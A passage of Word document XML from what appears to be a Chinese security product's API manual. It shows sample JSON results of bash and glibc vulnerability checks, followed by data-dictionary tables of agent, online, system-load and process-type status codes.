      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "version": "4.3-6ubuntu1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "fix_version": "4.3-7ubuntu1.1",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "bash"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "error": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4271A797" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "execute_type": 2,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cve_id": "CVE-2015-0235",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "poc_check_result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "vuln": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vuls": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "checkid": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "vuln": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "vulnmsg": "0000000",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "msg": "if ghost glibc not exist return '1234567890123456', otherwise return %vulnmsg%",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "title": "ghost_CVE-2015-0235_poc_check"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "error": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "host_id": "ffd324ed2a80f7f9",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ver_check_result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "vuln": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vuls": []</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "error": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D372626" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="SourceCode"/>
      </w:pPr>
      <w:r>
        <w:t>{</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "execute_type": 3,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "cve_id": "CVE-2014-7169",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "poc_check_result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "vuln": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vuls": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "msg": "\\u5b58\\u5728\\u6f0f\\u6d1e",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "vuln": true,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "info": "\\u5728/dev/shm\\u76ee\\u5f55\\u4e2d\\u53d1\\u73b0Poc\\u751f\\u6210\\u7684\\u6587\\u4ef6/dev/shm/QT_Test_1536521467"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "error": null</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "host_id": "308012a1e4f2e7fe",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    "ver_check_result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "vuln": 1,</w:t>
      </w:r>
      <w:r>
        <w:br/>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t xml:space="preserve">        "code": 0,</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "result": {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            "vuls": [</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                {</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "version": "4.1-2ubuntu3",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "fix_version": "4.1-2ubuntu3.2",</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                    "name": "bash"</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">                }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">            ]</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        },</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">        "error": ""</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t xml:space="preserve">    }</w:t>
      </w:r>
      <w:r>
        <w:br/>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67BF2E8F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="1"/>
      </w:pPr>
      <w:bookmarkStart w:id="259" w:name="附录4-数据字典"/>
      <w:bookmarkEnd w:id="258"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>附录4 数据字典</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C6A0AFA" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="260" w:name="通信状态"/>
      <w:r>
        <w:t>通信状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1402"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="24CFB76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B33E94A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1189BF3C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6C7A244E" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="04540FCB" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4FBCAA70" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="13E35C5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="145B0ED0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>离线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="4502B898" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="27EE8423" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>onlineStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="044FFEB2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0BEAAD30" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>在线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="147074DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="261" w:name="agent状态"/>
      <w:bookmarkEnd w:id="260"/>
      <w:r>
        <w:t>Agent状态</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1361"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="807"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2F0D104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9400D5D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="694D82C6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5D9EC589" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="41D04A2E" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23366922" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="796C020F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="3F97E8F1" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>在线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="5DD55058" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6EBA9E60" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="085AB6A6" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="1B1DB5D4" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>离线</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="29EA881C" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="5B782100" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2A96DF75" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="790758E7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>停用</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1F220515" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="25746D1F" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>agentStatus</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7E8AF4A8" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="33D8CC4A" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>删除中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="7729B411" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="262" w:name="系统负载"/>
      <w:bookmarkEnd w:id="261"/>
      <w:r>
        <w:t>系统负载</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="1355"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="630"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="657F59B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5EDEE48" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63DB0E9B" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="65CC30F7" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="1280AAAC" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="61A156C2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>systemLoad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="058A40CC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>0</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="23E4904D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>未知</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="3D1C085D" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6D205402" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>systemLoad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0C43D487" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="213D0601" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>低</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="082419D0" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7779B3DE" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>systemLoad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="12F654EC" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="0F248C39" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>中</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="70926339" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6BFEEF64" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>systemLoad</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2E32BD53" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>3</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="6B95E580" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>高</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
    </w:tbl>
    <w:p w14:paraId="3AF56822" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="00497C54">
      <w:pPr>
        <w:pStyle w:val="2"/>
      </w:pPr>
      <w:bookmarkStart w:id="263" w:name="windows进程类型"/>
      <w:bookmarkEnd w:id="262"/>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>windows进程类型</w:t>
      </w:r>
    </w:p>
    <w:tbl>
      <w:tblPr>
        <w:tblStyle w:val="Table"/>
        <w:tblW w:w="0" w:type="auto"/>
        <w:tblLook w:val="0020" w:firstRow="1" w:lastRow="0" w:firstColumn="0" w:lastColumn="0" w:noHBand="0" w:noVBand="0"/>
      </w:tblPr>
      <w:tblGrid>
        <w:gridCol w:w="632"/>
        <w:gridCol w:w="1044"/>
        <w:gridCol w:w="1514"/>
      </w:tblGrid>
      <w:tr w:rsidR="00497C54" w14:paraId="2ED8C5E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3A8C5E0" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="2CBC274D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>字段内容</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="493C7171" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:rPr>
                <w:bCs/>
              </w:rPr>
              <w:t>说明</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="28167852" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="4D2E190C" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="7C83B62D" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>1</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="63F0CDDD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>应用程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="127B58B7" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="01129DE3" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="423FB481" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>2</w:t>
            </w:r>
          </w:p>
        </w:tc>
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="20FC84B2" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>后台程序</w:t>
            </w:r>
          </w:p>
        </w:tc>
      </w:tr>
      <w:tr w:rsidR="00497C54" w14:paraId="60B1CD98" w14:textId="77777777" w:rsidTr="005C2F76">
        <w:tc>
          <w:tcPr>
            <w:tcW w:w="0" w:type="auto"/>
          </w:tcPr>
          <w:p w14:paraId="210712DD" w14:textId="77777777" w:rsidR="00497C54" w:rsidRDefault="00497C54" w:rsidP="005C2F76">
            <w:r>
              <w:t>type</w:t>
